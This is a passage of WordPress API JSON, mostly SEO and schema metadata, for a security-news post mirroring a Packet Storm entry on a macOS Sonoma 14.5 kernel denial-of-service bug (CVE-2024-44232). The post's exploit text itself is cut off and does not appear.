Service_PACKETSTORM:212319\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 macOS Sonoma 14.5 Denial of Service_PACKETSTORM:212319 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=28301","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 macOS Sonoma 14.5 Denial of Service_PACKETSTORM:212319 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2025-12-02T19:41:26&#8243;,&#8221;description&#8221;:&#8221;macOS Sonoma version 14.5 has a vulnerability in the AV1Syntax::ParseHeader function that can allow for a kernel crash&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-12-02T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-12-02T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 macOS Sonoma 14.5 Denial of Service&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:212319&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2024-44232&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================n |...","og_url":"https:\/\/zero.redgem.net\/?p=28301","og_site_name":"zero redgem","article_published_time":"2025-12-02T15:33:14+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"13 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=28301#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=28301"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 macOS Sonoma 14.5 Denial of Service_PACKETSTORM:212319","datePublished":"2025-12-02T15:33:14+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=28301"},"wordCount":2546,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-6.5","exploit","MEDIUM","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=28301#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=28301","url":"https:\/\/zero.redgem.net\/?p=28301","name":"\ud83d\udcc4 macOS Sonoma 14.5 Denial of Service_PACKETSTORM:212319 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-12-02T15:33:14+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=28301#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=28301"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=28301#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 macOS Sonoma 14.5 Denial of Service_PACKETSTORM:212319"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/28301","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=28301"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/28301\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=28301"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=28301"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=28301"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}